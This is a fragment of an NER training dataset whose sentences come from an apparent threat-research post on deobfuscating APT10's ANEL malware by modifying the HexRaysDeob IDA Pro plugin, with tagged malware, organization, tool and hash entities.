"aptner_train_000236", "source": "aptner_train"}} {"text": "ANEL ( also referred to as UpperCut )", "spans": {"Malware: ANEL": [[0, 4]], "Malware: UpperCut": [[27, 35]]}, "info": {"id": "aptner_train_000237", "source": "aptner_train"}} {"text": "is a RAT program used by APT10 and observed in Japan uniquely .", "spans": {"Organization: APT10": [[25, 30]]}, "info": {"id": "aptner_train_000238", "source": "aptner_train"}} {"text": "According to SecureWorks ,", "spans": {"Organization: SecureWorks": [[13, 24]]}, "info": {"id": "aptner_train_000239", "source": "aptner_train"}} {"text": "all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening .", "spans": {"Malware: ANEL": [[4, 8]]}, "info": {"id": "aptner_train_000240", "source": "aptner_train"}} {"text": "Opaque predicate is a programming term that refers to decision 
making where there is actually only one path .", "spans": {}, "info": {"id": "aptner_train_000241", "source": "aptner_train"}} {"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000242", "source": "aptner_train"}} {"text": "this can be seen as calculating a value that will always return True .", "spans": {}, "info": {"id": "aptner_train_000243", "source": "aptner_train"}} {"text": "Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end .", "spans": {}, "info": {"id": "aptner_train_000244", "source": "aptner_train"}} {"text": "Instead ,", "spans": {}, "info": {"id": "aptner_train_000245", "source": "aptner_train"}} {"text": "a switch statement is called in an infinite loop having multiple code blocks each performing operations .", "spans": {}, "info": {"id": "aptner_train_000246", "source": "aptner_train"}} {"text": "The obfuscations looked similar to the ones explained in Hex-Rays blog ,", "spans": {}, "info": {"id": "aptner_train_000247", "source": "aptner_train"}} {"text": "but the introduced IDA Pro plugin HexRaysDeob didn’t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation .", "spans": {"System: IDA Pro": [[19, 26]], "System: HexRaysDeob": [[34, 45]], "Malware: ANEL": [[84, 88]]}, "info": {"id": "aptner_train_000248", "source": "aptner_train"}} {"text": "TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations .", "spans": {"Organization: TAU": [[0, 3]], "Malware: ANEL": [[21, 25]], "System: HexRaysDeob": [[67, 78]]}, "info": {"id": "aptner_train_000249", "source": "aptner_train"}} {"text": "After the modification ,", "spans": {}, "info": {"id": "aptner_train_000250", "source": "aptner_train"}} {"text": "TAU was able to recover the original code .", "spans": {"Organization: TAU": [[0, 3]]}, "info": {"id": "aptner_train_000251", "source": "aptner_train"}} {"text": "HexRaysDeob is an 
IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries .", "spans": {"System: HexRaysDeob": [[0, 11]], "System: IDA Pro": [[18, 25]]}, "info": {"id": "aptner_train_000252", "source": "aptner_train"}} {"text": "In order to perform the deobfuscation ,", "spans": {}, "info": {"id": "aptner_train_000253", "source": "aptner_train"}} {"text": "the plugin manipulates the IDA intermediate language called microcode .", "spans": {}, "info": {"id": "aptner_train_000254", "source": "aptner_train"}} {"text": "If you aren’t familiar with those structures ( e.g ,", "spans": {}, "info": {"id": "aptner_train_000255", "source": "aptner_train"}} {"text": "microcode data structures ,", "spans": {}, "info": {"id": "aptner_train_000256", "source": "aptner_train"}} {"text": "maturity level ,", "spans": {}, "info": {"id": "aptner_train_000257", "source": "aptner_train"}} {"text": "Microcode Explorer and so on )", "spans": {"System: Microcode Explorer": [[0, 18]]}, "info": {"id": "aptner_train_000258", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000259", "source": "aptner_train"}} {"text": "you should read his blog post .", "spans": {}, "info": {"id": "aptner_train_000260", "source": "aptner_train"}} {"text": "Rolles also provides an overview of each obfuscation technique in the same post .", "spans": {}, "info": {"id": "aptner_train_000261", "source": "aptner_train"}} {"text": "HexRaysDeob installs two callbacks when loading :", "spans": {"System: HexRaysDeob": [[0, 11]]}, "info": {"id": "aptner_train_000262", "source": "aptner_train"}} {"text": "optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer )", "spans": {"System: optinsn_t": [[0, 9]], "System: ObfCompilerOptimizer": [[55, 75]]}, "info": {"id": "aptner_train_000263", "source": "aptner_train"}} {"text": "optblock_t for defeating control flow flattening ( defined as CFUnflattener )", "spans": {"System: optblock_t": [[0, 10]]}, "info": {"id": 
"aptner_train_000264", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000265", "source": "aptner_train"}} {"text": "Before continuing ,", "spans": {}, "info": {"id": "aptner_train_000266", "source": "aptner_train"}} {"text": "it is important to understand Hex-Rays maturity levels .", "spans": {"System: Hex-Rays": [[30, 38]]}, "info": {"id": "aptner_train_000267", "source": "aptner_train"}} {"text": "When a binary is loaded into IDA Pro ,", "spans": {"System: IDA Pro": [[29, 36]]}, "info": {"id": "aptner_train_000268", "source": "aptner_train"}} {"text": "the application will perform distinct layers of code analysis and optimization ,", "spans": {}, "info": {"id": "aptner_train_000269", "source": "aptner_train"}} {"text": "referred to as maturity levels .", "spans": {}, "info": {"id": "aptner_train_000270", "source": "aptner_train"}} {"text": "One layer will detect shellcode ,", "spans": {}, "info": {"id": "aptner_train_000271", "source": "aptner_train"}} {"text": "another optimizes it into blocks ,", "spans": {}, "info": {"id": "aptner_train_000272", "source": "aptner_train"}} {"text": "another determines global variables ,", "spans": {}, "info": {"id": "aptner_train_000273", "source": "aptner_train"}} {"text": "and so forth .", "spans": {}, "info": {"id": "aptner_train_000274", "source": "aptner_train"}} {"text": "The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist )", "spans": {"System: optinsn_t : :f unc": [[4, 22]], "System: MMAT_ZERO": [[75, 84]]}, "info": {"id": "aptner_train_000275", "source": "aptner_train"}} {"text": "to MMAT_GLBOPT2 ( most global optimizations completed )", "spans": {"System: MMAT_GLBOPT2": [[3, 15]]}, "info": {"id": "aptner_train_000276", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000277", "source": "aptner_train"}} {"text": "During the callback ,", "spans": {}, "info": {"id": "aptner_train_000278", 
"source": "aptner_train"}} {"text": "opaque predicates pattern matching functions are called .", "spans": {}, "info": {"id": "aptner_train_000279", "source": "aptner_train"}} {"text": "If the code pattern is matched with the definitions ,", "spans": {}, "info": {"id": "aptner_train_000280", "source": "aptner_train"}} {"text": "it is replaced with another expression for the deobfuscation .", "spans": {}, "info": {"id": "aptner_train_000281", "source": "aptner_train"}} {"text": "This is important to perform in each maturity level as the obfuscated code could be modified or removed as the code becomes more optimized .", "spans": {}, "info": {"id": "aptner_train_000282", "source": "aptner_train"}} {"text": "We defined two patterns for analysis of the ANEL sample .", "spans": {"Malware: ANEL": [[44, 48]]}, "info": {"id": "aptner_train_000283", "source": "aptner_train"}} {"text": "The global variable value dword_745BB58C is either even or odd ,", "spans": {}, "info": {"id": "aptner_train_000284", "source": "aptner_train"}} {"text": "so dword_745BB58C * ( dword_745BB58C – 1 )", "spans": {}, "info": {"id": "aptner_train_000285", "source": "aptner_train"}} {"text": "is always even .", "spans": {}, "info": {"id": "aptner_train_000286", "source": "aptner_train"}} {"text": "This results in", "spans": {}, "info": {"id": "aptner_train_000287", "source": "aptner_train"}} {"text": "the lowest bit of the negated value becoming 1 .", "spans": {}, "info": {"id": "aptner_train_000288", "source": "aptner_train"}} {"text": "Thus ,", "spans": {}, "info": {"id": "aptner_train_000289", "source": "aptner_train"}} {"text": "OR by -2 ( 0xFFFFFFFE )", "spans": {}, "info": {"id": "aptner_train_000290", "source": "aptner_train"}} {"text": "will always produce the value -1 .", "spans": {}, "info": {"id": "aptner_train_000291", "source": "aptner_train"}} {"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000292", "source": "aptner_train"}} {"text": "the pattern matching function 
replaces dword_745BB58C * ( dword_745BB58C – 1 )", "spans": {}, "info": {"id": "aptner_train_000293", "source": "aptner_train"}} {"text": "with 2 .", "spans": {}, "info": {"id": "aptner_train_000294", "source": "aptner_train"}} {"text": "The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API )", "spans": {"System: is_loaded API": [[111, 124]]}, "info": {"id": "aptner_train_000295", "source": "aptner_train"}} {"text": "and has only read accesses .", "spans": {}, "info": {"id": "aptner_train_000296", "source": "aptner_train"}} {"text": "So the pattern matching function replaces the global variable with 0 .", "spans": {}, "info": {"id": "aptner_train_000297", "source": "aptner_train"}} {"text": "There are some variants with this pattern ( e.g , the variable – 10 < 0 )", "spans": {}, "info": {"id": "aptner_train_000298", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000299", "source": "aptner_train"}} {"text": "where the immediate constant can be different .", "spans": {}, "info": {"id": "aptner_train_000300", "source": "aptner_train"}} {"text": "We also observed a pattern that was also using an 8-bit portion of the register .", "spans": {}, "info": {"id": "aptner_train_000301", "source": "aptner_train"}} {"text": "In the following example ,", "spans": {}, "info": {"id": "aptner_train_000302", "source": "aptner_train"}} {"text": "the variable v5 in pseudocode is a register operand ( cl )", "spans": {}, "info": {"id": "aptner_train_000303", "source": "aptner_train"}} {"text": "in microcode .", "spans": {}, "info": {"id": "aptner_train_000304", "source": "aptner_train"}} {"text": "We need to check if the value comes from the result of x * ( x – 1 )", "spans": {}, "info": {"id": "aptner_train_000305", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000306", "source": "aptner_train"}} {"text": "In another example ,", "spans": {}, 
"info": {"id": "aptner_train_000307", "source": "aptner_train"}} {"text": "the variable v2 in pseudocode is a register operand ( ecx )", "spans": {}, "info": {"id": "aptner_train_000308", "source": "aptner_train"}} {"text": "in microcode .", "spans": {}, "info": {"id": "aptner_train_000309", "source": "aptner_train"}} {"text": "We have to validate if a global variable with above-mentioned conditions is assigned to the register .", "spans": {}, "info": {"id": "aptner_train_000310", "source": "aptner_train"}} {"text": "Data-flow tracking code was added to detect these use-cases .", "spans": {}, "info": {"id": "aptner_train_000311", "source": "aptner_train"}} {"text": "The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list .", "spans": {"System: mblock_t": [[33, 41], [158, 166]], "System: optinsn_t : :f unc": [[93, 111]]}, "info": {"id": "aptner_train_000312", "source": "aptner_train"}} {"text": "However ,", "spans": {}, "info": {"id": "aptner_train_000313", "source": "aptner_train"}} {"text": "the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one .", "spans": {"System: mblock_t": [[35, 43]]}, "info": {"id": "aptner_train_000314", "source": "aptner_train"}} {"text": "If the setl is always sub-instruction during the optimization ,", "spans": {}, "info": {"id": "aptner_train_000315", "source": "aptner_train"}} {"text": "we never get the pointer .", "spans": {}, "info": {"id": "aptner_train_000316", "source": "aptner_train"}} {"text": "To handle this type of scenario ,", "spans": {}, "info": {"id": "aptner_train_000317", "source": "aptner_train"}} {"text": "the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction .", "spans": {"System: mblock_t": [[44, 52]]}, "info": {"id": "aptner_train_000318", "source": "aptner_train"}} {"text": "The original implementation calls 
the optblock_t : :f unc callback function in MMAT_LOCOPT ( local optimization and graphing are complete )", "spans": {"System: optblock_t : :f unc": [[38, 57]], "System: MMAT_LOCOPT": [[79, 90]]}, "info": {"id": "aptner_train_000319", "source": "aptner_train"}} {"text": "maturity level .", "spans": {}, "info": {"id": "aptner_train_000320", "source": "aptner_train"}} {"text": "Rolles previously explained the unflattening algorithm in a Hex-Rays blog .", "spans": {"System: Hex-Rays": [[60, 68]]}, "info": {"id": "aptner_train_000321", "source": "aptner_train"}} {"text": "For brevity I will quickly cover some key points to understand the algorithm at a high level .", "spans": {}, "info": {"id": "aptner_train_000322", "source": "aptner_train"}} {"text": "Normally the call flow graph ( CFG )", "spans": {}, "info": {"id": "aptner_train_000323", "source": "aptner_train"}} {"text": "of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored “ control flow dispatcher ”", "spans": {}, "info": {"id": "aptner_train_000324", "source": "aptner_train"}} {"text": "like this ,", "spans": {}, "info": {"id": "aptner_train_000325", "source": "aptner_train"}} {"text": "shown after the First Block .", "spans": {}, "info": {"id": "aptner_train_000326", "source": "aptner_train"}} {"text": "The original code is separated into the orange-colored “ first block ”", "spans": {}, "info": {"id": "aptner_train_000327", "source": "aptner_train"}} {"text": "and green-colored flattened blocks .", "spans": {}, "info": {"id": "aptner_train_000328", "source": "aptner_train"}} {"text": "The analyst is then required to resolve the correct next block and modify the destination accordingly .", "spans": {}, "info": {"id": "aptner_train_000329", "source": "aptner_train"}} {"text": "The next portion of first block and each flattened block is decided by a “ block comparison variable ”", "spans": {}, "info": {"id": "aptner_train_000330", "source": "aptner_train"}} 
{"text": "with an immediate value .", "spans": {}, "info": {"id": "aptner_train_000331", "source": "aptner_train"}} {"text": "The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks .", "spans": {}, "info": {"id": "aptner_train_000332", "source": "aptner_train"}} {"text": "If the variable registers for the comparison and assignment are different ,", "spans": {}, "info": {"id": "aptner_train_000333", "source": "aptner_train"}} {"text": "the assignment variable is called “ block update variable ”", "spans": {}, "info": {"id": "aptner_train_000334", "source": "aptner_train"}} {"text": "( which is further explained later )", "spans": {}, "info": {"id": "aptner_train_000335", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000336", "source": "aptner_train"}} {"text": "The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code .", "spans": {}, "info": {"id": "aptner_train_000337", "source": "aptner_train"}} {"text": "This is further detailed below .", "spans": {}, "info": {"id": "aptner_train_000338", "source": "aptner_train"}} {"text": "As previously detailed ,", "spans": {}, "info": {"id": "aptner_train_000339", "source": "aptner_train"}} {"text": "the original implementation of the code only works in MMAT_LOCOPT maturity level .", "spans": {"System: MMAT_LOCOPT": [[54, 65]]}, "info": {"id": "aptner_train_000340", "source": "aptner_train"}} {"text": "Rolles said this was to handle another obfuscation called “ Odd Stack Manipulations ”", "spans": {}, "info": {"id": "aptner_train_000341", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000342", "source": "aptner_train"}} {"text": "referred in his blog )", "spans": {}, "info": {"id": "aptner_train_000343", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": 
"aptner_train_000344", "source": "aptner_train"}} {"text": "However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates .", "spans": {"Malware: ANEL": [[28, 32]]}, "info": {"id": "aptner_train_000345", "source": "aptner_train"}} {"text": "As an example in the following obfuscated function ,", "spans": {}, "info": {"id": "aptner_train_000346", "source": "aptner_train"}} {"text": "the v3 and v7 variables are assigned to the block comparison variable ( b_cmp )", "spans": {}, "info": {"id": "aptner_train_000347", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000348", "source": "aptner_train"}} {"text": "However the values are dependent on opaque predicates results .", "spans": {}, "info": {"id": "aptner_train_000349", "source": "aptner_train"}} {"text": "Once the opaque predicates are broken ,", "spans": {}, "info": {"id": "aptner_train_000350", "source": "aptner_train"}} {"text": "the loop code becomes simpler .", "spans": {}, "info": {"id": "aptner_train_000351", "source": "aptner_train"}} {"text": "Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization )", "spans": {"System: MMAT_GLBOPT1": [[52, 64]], "System: MMAT_GLBOPT2": [[69, 81]]}, "info": {"id": "aptner_train_000352", "source": "aptner_train"}} {"text": "caused additional problems .", "spans": {}, "info": {"id": "aptner_train_000353", "source": "aptner_train"}} {"text": "The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial )", "spans": {"System: mblock_t : :s erial": [[120, 139]]}, "info": {"id": "aptner_train_000354", "source": "aptner_train"}} {"text": "used in the microcode .", "spans": {}, "info": {"id": "aptner_train_000355", "source": "aptner_train"}} {"text": "In later maturity levels ,", "spans": 
{}, "info": {"id": "aptner_train_000356", "source": "aptner_train"}} {"text": "some blocks are deleted by the optimization after defeating opaque predicates ,", "spans": {}, "info": {"id": "aptner_train_000357", "source": "aptner_train"}} {"text": "which removes the mapping information .", "spans": {}, "info": {"id": "aptner_train_000358", "source": "aptner_train"}} {"text": "In the example below ,", "spans": {}, "info": {"id": "aptner_train_000359", "source": "aptner_train"}} {"text": "the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block .", "spans": {}, "info": {"id": "aptner_train_000360", "source": "aptner_train"}} {"text": "The mapping can be created by checking the conditional jump instruction ( jnz )", "spans": {}, "info": {"id": "aptner_train_000361", "source": "aptner_train"}} {"text": "in MMAT_LOCOPT .", "spans": {"System: MMAT_LOCOPT": [[3, 14]]}, "info": {"id": "aptner_train_000362", "source": "aptner_train"}} {"text": "Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted .", "spans": {"System: MMAT_GLBOPT2": [[47, 59]]}, "info": {"id": "aptner_train_000363", "source": "aptner_train"}} {"text": "So the next block of the first one in the level can not be determined .", "spans": {}, "info": {"id": "aptner_train_000364", "source": "aptner_train"}} {"text": "To resolve that issue ,", "spans": {}, "info": {"id": "aptner_train_000365", "source": "aptner_train"}} {"text": "the code was written to link the block comparison variable and block address in MMAT_LOCOPT ,", "spans": {"System: MMAT_LOCOPT": [[80, 91]]}, "info": {"id": "aptner_train_000366", "source": "aptner_train"}} {"text": "as the block number is changed in each maturity level .", "spans": {}, "info": {"id": "aptner_train_000367", "source": "aptner_train"}} {"text": "If the code can’t determine the mapping in later maturity levels ,", "spans": {}, "info": {"id": 
"aptner_train_000368", "source": "aptner_train"}} {"text": "it attempts to guess the next block number based on the address ,", "spans": {}, "info": {"id": "aptner_train_000369", "source": "aptner_train"}} {"text": "considering each block and instruction addresses .", "spans": {}, "info": {"id": "aptner_train_000370", "source": "aptner_train"}} {"text": "The guessing is not 100% accurate however it works for the majority of obfuscated functions tested .", "spans": {}, "info": {"id": "aptner_train_000371", "source": "aptner_train"}} {"text": "Though the original implementation assumes an obfuscated function has only one control flow dispatcher ,", "spans": {}, "info": {"id": "aptner_train_000372", "source": "aptner_train"}} {"text": "some functions in the ANEL sample have multiple control dispatchers .", "spans": {}, "info": {"id": "aptner_train_000373", "source": "aptner_train"}} {"text": "Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 ,", "spans": {"System: optblock_t : :f unc": [[31, 50]], "System: MMAT_GLBOPT1": [[63, 75]], "System: MMAT_GLBOPT2": [[80, 92]]}, "info": {"id": "aptner_train_000374", "source": "aptner_train"}} {"text": "as the result was not correct in MMAT_CALLS ( detecting call arguments )", "spans": {"System: MMAT_CALLS": [[33, 43]]}, "info": {"id": "aptner_train_000375", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000376", "source": "aptner_train"}} {"text": "However ,", "spans": {}, "info": {"id": "aptner_train_000377", "source": "aptner_train"}} {"text": "this did not work for functions with three or more dispatchers .", "spans": {}, "info": {"id": "aptner_train_000378", "source": "aptner_train"}} {"text": "Additionally ,", "spans": {}, "info": {"id": "aptner_train_000379", "source": "aptner_train"}} {"text": "Hex-Rays kernel doesn’t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required .", "spans": {"System: 
Hex-Rays": [[0, 8]], "System: MMAT_GLBOPT2": [[51, 63]]}, "info": {"id": "aptner_train_000380", "source": "aptner_train"}} {"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000381", "source": "aptner_train"}} {"text": "the callback is executed just once in the implementation .", "spans": {}, "info": {"id": "aptner_train_000382", "source": "aptner_train"}} {"text": "To handle multiple control flow dispatchers ,", "spans": {}, "info": {"id": "aptner_train_000383", "source": "aptner_train"}} {"text": "a callback for decompiler events was implemented .", "spans": {}, "info": {"id": "aptner_train_000384", "source": "aptner_train"}} {"text": "The code catches the “ hxe_prealloc ”", "spans": {}, "info": {"id": "aptner_train_000385", "source": "aptner_train"}} {"text": "event ( according to Hex-Rays ,", "spans": {"System: Hex-Rays": [[21, 29]]}, "info": {"id": "aptner_train_000386", "source": "aptner_train"}} {"text": "this is the final event for optimizations )", "spans": {}, "info": {"id": "aptner_train_000387", "source": "aptner_train"}} {"text": "then calls optblock_t : :f unc callback .", "spans": {"System: calls optblock_t : :f unc": [[5, 30]]}, "info": {"id": "aptner_train_000388", "source": "aptner_train"}} {"text": "Typically this event occurs a few times to several times ,", "spans": {}, "info": {"id": "aptner_train_000389", "source": "aptner_train"}} {"text": "so the callback can deobfuscate multiple control flow flattenings .", "spans": {}, "info": {"id": "aptner_train_000390", "source": "aptner_train"}} {"text": "Other additional modifications were made to the code ( e.g , writing a new algorithm for finding control flow dispatcher and first block ,", "spans": {}, "info": {"id": "aptner_train_000391", "source": "aptner_train"}} {"text": "validating a block comparison variable ,", "spans": {}, "info": {"id": "aptner_train_000392", "source": "aptner_train"}} {"text": "and so on )", "spans": {}, "info": {"id": "aptner_train_000393", "source": 
"aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000394", "source": "aptner_train"}} {"text": "After the modification ,", "spans": {}, "info": {"id": "aptner_train_000395", "source": "aptner_train"}} {"text": "for example ,", "spans": {}, "info": {"id": "aptner_train_000396", "source": "aptner_train"}} {"text": "the following functions with multiple control flow dispatchers can be unflattened .", "spans": {}, "info": {"id": "aptner_train_000397", "source": "aptner_train"}} {"text": "The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block ( the cases are then simplified )", "spans": {}, "info": {"id": "aptner_train_000398", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000399", "source": "aptner_train"}} {"text": "In the second case ,", "spans": {}, "info": {"id": "aptner_train_000400", "source": "aptner_train"}} {"text": "block comparison variable is searched in each block of endsWithJcc and nonJcc .", "spans": {"System: endsWithJcc": [[55, 66]], "System: nonJcc": [[71, 77]]}, "info": {"id": "aptner_train_000401", "source": "aptner_train"}} {"text": "If the next block is resolved ,", "spans": {}, "info": {"id": "aptner_train_000402", "source": "aptner_train"}} {"text": "the CFG ( specifically mblock_t : :p redset and mblock_t : :s uccset )", "spans": {"System: mblock_t : :p redset": [[23, 43]], "System: mblock_t : :s uccset": [[48, 68]]}, "info": {"id": "aptner_train_000403", "source": "aptner_train"}} {"text": "and the destination of goto jump instruction are updated .", "spans": {}, "info": {"id": "aptner_train_000404", "source": "aptner_train"}} {"text": "The code tracks the block comparison variable in each predecessor and more ( if any conditional blocks before the predecessor )", "spans": {}, "info": {"id": "aptner_train_000405", "source": "aptner_train"}} {"text": "to identify each next block for unflattening .", 
"spans": {}, "info": {"id": "aptner_train_000406", "source": "aptner_train"}} {"text": "And ,", "spans": {}, "info": {"id": "aptner_train_000407", "source": "aptner_train"}} {"text": "in the third case that was implemented ,", "spans": {}, "info": {"id": "aptner_train_000408", "source": "aptner_train"}} {"text": "the block comparison variables are not assigned in the flattened blocks but rather the first blocks according to a condition .", "spans": {}, "info": {"id": "aptner_train_000409", "source": "aptner_train"}} {"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000410", "source": "aptner_train"}} {"text": "the following microcode graph shows edi is assigned to esi ( the block comparison variable in this case )", "spans": {}, "info": {"id": "aptner_train_000411", "source": "aptner_train"}} {"text": "in block number 7 but the edi value is assigned in block number 1 and 2 .", "spans": {}, "info": {"id": "aptner_train_000412", "source": "aptner_train"}} {"text": "If the immediate value for block comparison variable is not found in the flattened blocks ,", "spans": {}, "info": {"id": "aptner_train_000413", "source": "aptner_train"}} {"text": "the new code tries to trace the first blocks to obtain the value and reconnects block number 1 and 2 as successors of block number 7 ,", "spans": {}, "info": {"id": "aptner_train_000414", "source": "aptner_train"}} {"text": "in addition to normal operations mentioned in the original cases .", "spans": {}, "info": {"id": "aptner_train_000415", "source": "aptner_train"}} {"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000416", "source": "aptner_train"}} {"text": "the code parses the structure in first blocks then reconnects each conditional blocks under the flattened blocks ( #1 and #2 as successors of #13 ,", "spans": {}, "info": {"id": "aptner_train_000417", "source": "aptner_train"}} {"text": "#3 and #4 as successors of #11 )", "spans": {}, "info": {"id": "aptner_train_000418", "source": 
"aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000419", "source": "aptner_train"}} {"text": "Last ,", "spans": {}, "info": {"id": "aptner_train_000420", "source": "aptner_train"}} {"text": "but not least ,", "spans": {}, "info": {"id": "aptner_train_000421", "source": "aptner_train"}} {"text": "in all cases explained here ,", "spans": {}, "info": {"id": "aptner_train_000422", "source": "aptner_train"}} {"text": "the tail instruction of the dispatcher predecessor can be a conditional jump like jnz ,", "spans": {}, "info": {"id": "aptner_train_000423", "source": "aptner_train"}} {"text": "not just goto .", "spans": {}, "info": {"id": "aptner_train_000424", "source": "aptner_train"}} {"text": "The modified code checks the tail instruction and if the true case destination is a control flow dispatcher ,", "spans": {}, "info": {"id": "aptner_train_000425", "source": "aptner_train"}} {"text": "it updates the CFG and the destination of the instruction .", "spans": {}, "info": {"id": "aptner_train_000426", "source": "aptner_train"}} {"text": "The following changes are minor compared with above referenced ones .", "spans": {}, "info": {"id": "aptner_train_000427", "source": "aptner_train"}} {"text": "Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number ( jnz/jle in JZCollector ,", "spans": {"System: JZCollector": [[165, 176]]}, "info": {"id": "aptner_train_000428", "source": "aptner_train"}} {"text": "jnz in JZMapper )", "spans": {"System: JZMapper": [[7, 15]]}, "info": {"id": "aptner_train_000429", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000430", "source": "aptner_train"}} {"text": "An entropy threshold adjustment due to check in high maturity level .", "spans": {}, "info": {"id": "aptner_train_000431", "source": "aptner_train"}} {"text": "Multiple block tracking for getting block comparison variable .", 
"spans": {}, "info": {"id": "aptner_train_000432", "source": "aptner_train"}} {"text": "And the last change that was introduced in regards to", "spans": {}, "info": {"id": "aptner_train_000433", "source": "aptner_train"}} {"text": "the block update variable referred in the overview .", "spans": {}, "info": {"id": "aptner_train_000434", "source": "aptner_train"}} {"text": "Some functions in the ANEL sample utilize this ,", "spans": {"Malware: ANEL": [[22, 26]]}, "info": {"id": "aptner_train_000435", "source": "aptner_train"}} {"text": "however the assignment is a little bit tricky .", "spans": {}, "info": {"id": "aptner_train_000436", "source": "aptner_train"}} {"text": "By using the and instruction ,", "spans": {}, "info": {"id": "aptner_train_000437", "source": "aptner_train"}} {"text": "the immediate values used in comparison look different from assigned ones .", "spans": {}, "info": {"id": "aptner_train_000438", "source": "aptner_train"}} {"text": "The modified code will consider this .", "spans": {}, "info": {"id": "aptner_train_000439", "source": "aptner_train"}} {"text": "The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) :", "spans": {"Malware: ANEL": [[37, 41]], "Organization: FireEye": [[139, 146]]}, "info": {"id": "aptner_train_000440", "source": "aptner_train"}} {"text": "3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d .", "spans": {"Indicator: 3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d": [[0, 64]]}, "info": {"id": "aptner_train_000441", "source": "aptner_train"}} {"text": "The code is able to deobfuscate 34 of 38 functions ( 89% )", "spans": {}, "info": {"id": "aptner_train_000442", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000443", "source": "aptner_train"}} {"text": "It should be noted every function is not always obfuscated .", "spans": {}, "info": {"id": 
"aptner_train_000444", "source": "aptner_train"}} {"text": "The failure examples are :", "spans": {}, "info": {"id": "aptner_train_000445", "source": "aptner_train"}} {"text": "Not yet implemented cases ( e.g ,", "spans": {}, "info": {"id": "aptner_train_000446", "source": "aptner_train"}} {"text": "a conditional jump of the dispatcher predecessor’s tail instruction in goto N predecessors case ,", "spans": {}, "info": {"id": "aptner_train_000447", "source": "aptner_train"}} {"text": "consecutive if-statement flattened blocks )", "spans": {}, "info": {"id": "aptner_train_000448", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000449", "source": "aptner_train"}} {"text": "An incorrect choice of control flow dispatcher and first block ( algorithm error )", "spans": {}, "info": {"id": "aptner_train_000450", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000451", "source": "aptner_train"}} {"text": "These fixes will be prioritized for future releases .", "spans": {}, "info": {"id": "aptner_train_000452", "source": "aptner_train"}} {"text": "Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code )", "spans": {}, "info": {"id": "aptner_train_000453", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000454", "source": "aptner_train"}} {"text": "using the following IDAPython command in Output window :", "spans": {"System: IDAPython": [[20, 29]]}, "info": {"id": "aptner_train_000455", "source": "aptner_train"}} {"text": "idc.load_and_run_plugin", "spans": {}, "info": {"id": "aptner_train_000456", "source": "aptner_train"}} {"text": "(", "spans": {}, "info": {"id": "aptner_train_000457", "source": "aptner_train"}} {"text": "“ HexRaysDeob ”", "spans": {"System: HexRaysDeob": [[2, 13]]}, "info": {"id": "aptner_train_000458", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000459", 
